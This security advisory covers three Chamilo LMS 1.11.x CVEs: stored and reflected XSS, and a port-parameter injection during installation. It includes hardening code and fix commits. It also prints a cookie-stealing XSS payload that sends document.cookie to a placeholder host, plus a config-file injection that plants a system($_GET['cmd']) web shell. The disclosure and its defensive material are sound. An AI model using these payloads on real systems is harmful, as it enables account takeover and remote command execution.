# Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation

## [CVE-2021-37391](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37391) - From Stored XSS to account takeover

{% hint style="success" %}
**Title:** From Stored XSS to account takeover\
**Vulnerability:** Stored XSS\
**CVE ID:** [CVE-2021-37391](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37391)\
**CVSS:** Medium - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N
{% endhint %}

A user without privileges in Chamilo LMS 1.11.x can send an invitation message to another user, e.g., the administrator, through **main/social/search.php** and **main/inc/lib/social.lib.php**, and steal cookies or execute arbitrary code on the administrator's side via a stored XSS vulnerability in the social network's "send invitation" feature.

**Proof-of-Concept**

A guest user without privileges on the Chamilo LMS could send an invitation with a malicious message that puts the administrator's session at risk. In short, it was possible to exploit a stored XSS vulnerability to steal the authentication token (session cookie) of another user, in this case the administrator. This scenario could be abused to take over the administrator account.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MglsUZAwCH2fWNbW1oR%2F-MgltwMQ7TB4dKRUmvp2%2Fimage.png?alt=media\&token=328ea2c7-772b-4ef6-8dbf-2aade9212cab)

After that, click the **Send message** button.

On the admin side, the payload is executed by opening the invitations panel on the left menu.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MglsUZAwCH2fWNbW1oR%2F-MglvK1iHxbVlw_kLaYC%2Fimage.png?alt=media\&token=7fc83921-3dd7-48e8-ab6a-c9fc7cad9662)

By using a custom payload, it was possible to get the administrator's cookie and clone their session.

```
<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>
```

**Impact:** Using this vulnerability, an unprivileged user can steal cookies from an admin account or force the administrator to create an account with admin privileges via an HTTP 302 redirect.
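As an added illustration (this is not Chamilo's code and not the upstream fix), the following PHP shows the two defender-side controls that break this chain: contextual output encoding when the stored invitation message is rendered, and an HttpOnly session cookie so that `document.cookie` cannot reveal the session even if a script does run. The function names `renderInvitationUnsafe`, `renderInvitationSafe` and `configureSessionCookie` are assumptions; the sample message is the payload shown above. The same output-encoding rule applies to the reflected search parameter and the installer fields covered later on this page.

```php
<?php
// Added example (not Chamilo's code): safe rendering of a user-supplied
// invitation message, plus an HttpOnly session cookie as defence in depth.
// Function and variable names are illustrative assumptions.

declare(strict_types=1);

// Constructed sample: the payload from this page, as submitted in the
// invitation message field.
$invitationMessage = "<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>";

// Vulnerable pattern: the stored message is concatenated into HTML as-is,
// so the browser parses the <img> tag and runs the onerror handler.
function renderInvitationUnsafe(string $message): string
{
    return '<div class="invitation">' . $message . '</div>';
}

// Hardened pattern: contextual output encoding. htmlspecialchars() with
// ENT_QUOTES | ENT_SUBSTITUTE converts <, >, ", ' and & into entities, so the
// message is displayed as text and never interpreted as markup.
function renderInvitationSafe(string $message): string
{
    $encoded = htmlspecialchars($message, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="invitation">' . $encoded . '</div>';
}

// Defence in depth for the takeover step: a session cookie flagged HttpOnly
// is not exposed to document.cookie, so a script that does execute cannot
// exfiltrate it this way. Secure and SameSite narrow the abuse further.
// This must be called before session_start().
function configureSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,
        'httponly' => true,
        'samesite' => 'Lax',
    ]);
}

// The unsafe renderer passes the raw <img ... onerror=...> tag through;
// the safe renderer emits only entity-encoded text.
echo renderInvitationUnsafe($invitationMessage), PHP_EOL;
echo renderInvitationSafe($invitationMessage), PHP_EOL;
```

Encoding belongs at the output sink, not only at input time: the message is stored once but may be rendered in several places (invitation panel, notifications, e-mail previews), and each HTML context needs its own escaping.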

**Mitigation:** Update Chamilo to the latest version.

**Fix**: <https://github.com/chamilo/chamilo-lms/commit/de43a77049771cce08ea7234c5c1510b5af65bc8>

**ExploitDB**: <https://www.exploit-db.com/exploits/50694>

## [CVE-2021-37390](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37390) - Reflected XSS search mechanism

{% hint style="success" %}
**Title:** Reflected XSS search mechanism\
**Vulnerability:** Reflected XSS\
**CVE ID:** [CVE-2021-37390](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37390)\
**CVSS:** Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
{% endhint %}

A Chamilo LMS 1.11.14 reflected XSS vulnerability exists in the `q` parameter of the **main/social/search.php** URI (social network search feature).

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MglvmrAQmULoJq2HmhC%2F-Mglx19nAKXKZPufadJC%2Fimage.png?alt=media\&token=9587b6e0-f851-4f09-9bbc-6dd48265b760)

**Impact:** Using this vulnerability, an unprivileged user can steal cookies from an admin account or force the administrator to create an account with admin privileges via an HTTP 302 redirect.

**Mitigation:** Update Chamilo to the latest version.

**Fix**: <https://github.com/chamilo/chamilo-lms/commit/3fcc751d5cc7da311532a8756fba5a8778f50ca0>

## CVE-2021-37389 - From Stored XSS to PHP backdoor implantation

{% hint style="success" %}
**Title:** From Stored XSS to PHP backdoor implantation\
**Vulnerability:** Stored XSS\
**CVE ID:** [CVE-2021-37389](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37389)\
**CVSS:** Medium - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:H
{% endhint %}

Chamilo 1.11.14 allows stored XSS via **main/install/index.php** and **main/install/ajax.php** through the **port parameter**.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-Mgly11symyRhfs7v5jU%2F-MglycdEaps2tLnxTiQl%2Fimage.png?alt=media\&token=86ce83ec-f0bb-432b-9187-f8967a8d1c47)

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-Mgly11symyRhfs7v5jU%2F-Mgm-atvaNfqTTGy5Tm-%2Fimage.png?alt=media\&token=eb58b6dc-6826-4e08-a4ab-4e97b65b0eae)

As expected, the submitted **payload is stored in the config.php** file on the web server. Because this parameter was not validated correctly, it could be abused to implant a PHP backdoor on the web server by injecting the payload shown below through the port parameter.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MgmBB95C0ewoJCrxsZ-%2F-MgmDvU_hLhZUHxwA8nr%2Fimage.png?alt=media\&token=53a58aeb-5f8a-407d-85fc-28c093b061a7)

**Target payload:**

```
3306';echo system($_GET["cmd"]);
```

{% hint style="warning" %}
The values will be written into your configuration file **app/config/configuration.php** :sunglasses:
{% endhint %}

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MgmBB95C0ewoJCrxsZ-%2F-MgmFaBHEOsnSEnlTtNW%2Fimage.png?alt=media\&token=c60426a9-8496-4823-9403-75a10b35532f)

We got it :sunglasses:

```
http://localhost/chamilo/app/config/configuration.php?cmd=id
```

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-MgmBB95C0ewoJCrxsZ-%2F-MgmFPtidTvhZR-6k7nH%2Fimage.png?alt=media\&token=e929ad21-d6fe-4f3a-94d0-60f143d6200f)
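The root cause here is that a request value is pasted into generated PHP source. As an added example (not Chamilo's installer code and not the upstream fix), the PHP below contrasts that pattern with the two fixes a reviewer would ask for: strict validation of the port as an integer in range, and building the file with `var_export()` so that no value can ever close a string literal. The function names `buildConfigUnsafe`, `validatePort` and `buildConfigSafe` and the `$_configuration` layout are assumptions; the sample inputs are a legitimate port and the payload from this page.

```php
<?php
// Added example (not Chamilo's code): validating the database port before it
// is written into a generated PHP configuration file. Function names and the
// configuration layout are illustrative assumptions.

declare(strict_types=1);

// Vulnerable pattern: the raw request value is interpolated into PHP source.
// With the payload  3306';echo system($_GET["cmd"]);  the single quote closes
// the string literal and the remainder becomes code in the config file.
function buildConfigUnsafe(string $host, string $port): string
{
    return "<?php\n"
         . "\$_configuration['db_host'] = '$host';\n"
         . "\$_configuration['db_port'] = '$port';\n";
}

// Fix, step 1: validate. A port is an integer in 1..65535; anything else is
// rejected outright rather than "cleaned up".
function validatePort(string $port): int
{
    $value = filter_var($port, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 1, 'max_range' => 65535],
    ]);
    if ($value === false) {
        throw new InvalidArgumentException('db_port must be an integer between 1 and 65535');
    }
    return $value;
}

// Fix, step 2: never assemble PHP source by string interpolation. var_export()
// emits a correctly quoted and escaped literal for every value, so even a
// string that passed validation cannot break out of its literal.
function buildConfigSafe(string $host, string $port): string
{
    $config = [
        'db_host' => $host,
        'db_port' => validatePort($port),
    ];
    return "<?php\n\$_configuration = " . var_export($config, true) . ";\n";
}

// Constructed sample inputs: a legitimate port and the page's injection payload.
$benign  = '3306';
$payload = '3306\';echo system($_GET["cmd"]);';

// The unsafe builder reproduces the injected code in the generated file
// (shown here as text only; nothing is written to disk).
echo buildConfigUnsafe('localhost', $payload), PHP_EOL;

// The safe builder accepts the benign value and rejects the payload.
echo buildConfigSafe('localhost', $benign), PHP_EOL;
try {
    buildConfigSafe('localhost', $payload);
} catch (InvalidArgumentException $e) {
    echo 'Rejected: ', $e->getMessage(), PHP_EOL;
}
```

Both steps matter independently: validation keeps garbage out of the database settings, and `var_export()` protects the other installer fields (host, user, password, names) that legitimately contain arbitrary characters and therefore cannot be fixed by validation alone.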

### BONUS: Other XSS vulnerabilities

During the installation process, a lot of fields are also vulnerable to stored XSS, namely:

* **Administrator login**
* **Administrator first name**
* **Administrator last name**
* **Administrator email**
* **Your personal name; and**
* **Your company short name**

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-Mgly11symyRhfs7v5jU%2F-Mgm01V9U8iJBh1csr0C%2Fimage.png?alt=media\&token=82f9e43b-16ff-4f52-8ad7-1c97bd00788e)

As a result, the payloads are stored in the database and reflected on the website.

![](https://4052868066-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MWd-VcvRHVgUtkahm85%2F-Mgly11symyRhfs7v5jU%2F-Mgm0Mz5ny9tV6rcqpwd%2Fimage.png?alt=media\&token=ccfe2beb-96c5-4bf4-baa6-737bb1610e4a)

**Impact:** Using this vulnerability, an unprivileged user can steal cookies from an admin account or force the administrator to create an account with admin privileges via an HTTP 302 redirect.

In addition, the port parameter can also be used to implant a PHP backdoor on the web server.

**Mitigation:** Update Chamilo to the latest version.

**Fix**: <https://github.com/chamilo/chamilo-lms/commit/dfae49f5dc392c00cd43badcb3043db3a646ff0c>

{% embed url="https://support.chamilo.org/projects/1/wiki/Security_issues" %}

